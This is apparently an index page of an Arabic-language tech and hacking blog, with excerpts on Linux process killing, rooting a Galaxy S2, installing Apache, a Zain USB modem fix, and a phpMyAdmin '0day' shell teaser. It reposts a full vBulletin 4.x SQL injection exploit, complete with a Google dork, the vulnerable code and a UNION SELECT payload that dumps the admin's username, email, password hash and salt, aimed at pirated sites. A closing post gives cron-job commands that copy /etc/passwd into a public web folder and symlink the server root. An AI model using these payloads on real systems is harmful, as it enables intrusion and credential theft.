كيفية ايقاف البرامج المفعلة في سيرفرات لينكس

سلام عليكم

اليوم سوف اشرح كيفية التعامل مع سكربت امر kill في انظمة لينكس
وظيفة الامر هو ايقاف الخدمات او البرامج على السيرفر .. ولعرض جميع العمليات النشطة

طبق امر ” ps -ax”

 

Continue reading “كيفية ايقاف البرامج المفعلة في سيرفرات لينكس”

تركيب الرووت على Samsung Galaxy s2


مساء الخير  شباب ؟  

كيف الحال ؟ اتمنى ان يكون الجميع بخير ايضا مضى وقت طويل على عدم التدوين والسبب هو بعض الضروف الشخصية التي اخرجتني عن كثير من الامور لا داعي لذكرها اليوم رجعت لكم بتدوينة شيقة وجميلة وهي عن محبوب الكل Android  وهو كيفية تركيب خاصية الـ ROOT او ما يسمى في الاجهزة بالسوبر يوزر … كثير من الايام اشاهد شروحات طويلة وعريضة عن تركيب صلاحيات رووت لاجهزة الموبايل التي تحمل انظمة اندرويد وبما اني املك جهاز جالاكسي اس 2 ونظام انرويد .!!! :d بعد البحث في الانترنت عن طريقة مختصرة لتركيب الرووت وجت برنامج سهل وبسيط جدا وهو برنامج يساعدك على تركيب الرووت بضغطة رز .!!! امر جميل صحيح ؟ اسم البرنامج هو UNLOOCK ROOT

Continue reading “تركيب الرووت على Samsung Galaxy s2”

شرح تثبيت السيرفر الشخصي وكل ملحقاته عن نظام Ubuntu

السلام عليكم .. اليوم موضوع بسيط ومسلي للذين يتسخدمون انظمة لينكس كبداية لهم او بمعنى اصح مبتدئين على

نظام لينكس .!! شيء اكيد لا يعرفون كيف تنصيب بعض الاداوت المهم  اليوم سوف اشرح كيفية تنصيب اباتشي

سيرفر على اوبنتو

اول افتح التيرمنال ونفذ الامر
sudo apt-get install apache2

عندما يكتمل كل شيء عليك فحص الاباتشي قد تم تنصيبه بنجاح او يوجد فيه مشاكل افتح متصفحك واكتب عنوان

سيرفر الاباشتي الافتراضي الذي هو
http://localhost
اذا رأيت جملة في المتصفح هي
“It works!”
هذا يعني ان الاباشتي قد تم تنصيبه بنجاح عمل جيد 😉
وفي نهاية التصميم اذا رأيت هذا مثل هذا المسج

“Could not reliably determine the server’s fully qualified

domain name, using 127.0.1.1 for ServerName“.

تقد ان تصلح الخطأ عن اتبع الاوامر الذي سوف انفذها
gksu gedit /etc/apache2/conf.d/fqdn
Continue reading “شرح تثبيت السيرفر الشخصي وكل ملحقاته عن نظام Ubuntu”

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability

print?
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url]http://members.vbulletin.com/][/url]

######################################################################################################

Vulnerability:
######################################################################################################

Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter “&messagegroupid” due to improper input validation.

#####################################################################################################
Vulnerable Code:
#####################################################################################################

File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid

if ($registry->GPC_exists[‘messagegroupid’] AND count($registry->GPC[‘messagegroupid’]) > 0)

{

$value = $registry->GPC[‘messagegroupid’];

if (!is_array($value))

{

$value = array($value);

}

if (!(in_array(‘ ‘,$value) OR in_array(”,$value)))

{

if ($rst = $vbulletin->db->query_read(“

SELECT socialgroup.name

FROM ” . TABLE_PREFIX.”socialgroup AS socialgroup

—> WHERE socialgroup.groupid IN (” . implode(‘, ‘, $value) .”)”)

}

############################################################################################
Exploitation:
############################################################################################
Post data on: –>search.php?search_type=1
–> Search Single Content Type

Keywords : Valid Group Message

Search Type : Group Messages

Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

##########################################################################################
More Details:
##########################################################################################

http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day

###########################################################################################
Note:
###########################################################################################

Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. ” Say No to Piracy Disclosure “.

phpMyAdmin-0day

                     .-"""-.
                    / .===. \
                    \/ 6 6 \/
                    ( \___/ )
  ______________ooo__\_____/__________________
 /                                             \
|           __  __  ___                        |
|        /|  _)  _)   /_| _       _ _  _       |
|         | __) __)  /(_|(_|\/.  (_(_)|||      |
|                           /                  |
| $3ll:      G5 (W.DLL) version 1.5            |
| author:    NULLNAM  (wadelamin)              |
| E-mail:    noemail@no.no :D                  |
|                                              |
|                                              |
 \___________________________ooo______________/
                    |  |  |
                    |_ | _|
                    |  |  |
                    |__|__|
                    /-'P'-\
                   (__/ \__)

Continue reading “phpMyAdmin-0day”

على انظمة لينكس USB Zain internet حل مشكلة تشغيل

كيف الحال زوار المدونة الكرام ؟؟  اليوم موضوع مفيد وجميل الموضوع هو عبارة عن حل لمشكلة عدم تشغيل انترنت يو اس بي زين وهي من المعروف والافتراضي تشغيلها على انمظمة وندوز من قبل المستخدمين .! لكن بعض الاشخاص يستخدم انظمة مفتوحة المصدر ” لينكس ” وهنا قد توجد المشكلة للمستخدم ..الشرح سوف يكون على توزعية الاكثر استخداماً اوبنتو وتوجد طريقة على اوبن سوزي لكني شرحت على التوزعية الاسهل والاكثر استخداماً

🙂

اولا قمت بتحميل الحزمتين

usb_modeswitch-data و sakis3g

ثم قمت بفك الضغط

cd usb-modeswitch-data-20101202/

sudo gedit  Makefile

Continue reading “على انظمة لينكس USB Zain internet حل مشكلة تشغيل”

bypass sec via Execute Command For cron jobs

سلام عليكم شباب

كيف الحال , مضى زمن طويل على تدوينات الهاكر ولا ادرجها في المدونة بسبب عدم اهتمامي الكبير في الهاكر هذا الفترة بسبب تركيزي على البرمجة وان شاء الله نرجع

مغزى الموضوع …بعض الاحيان لما تدخل سيرفر وتشاهد الحماية تقريبا فول اوبشن من السيف مود و الديسيبل فانكشنز وغيرها من الامور …وفي هذا الفترة الحمايات تطورت بعض الشيء وهناك اسلوب جديد في الحماية ..بعض الاشخاص يترك السيرفر حتى اذا كان عنده سي بنل .!!! وهذا اكبر خطأ الموضوع وما في تخطي الحمايات عن طريق الكرون جوبز وهي عن طريق هذا الاوامر

cd /home/user/public_html/; cat /etc/passwd>user.txt

cd /home/user/public_html/sec/; ln -sf / 1.txt

اعتقد الامر واضح ما يحتاج شرح صوري ومن هذا الامور وان شاء الله الدرس القادم طريقة حماية سيرفرك من هذا الثغرة

 

في امان الله

./Security-Mind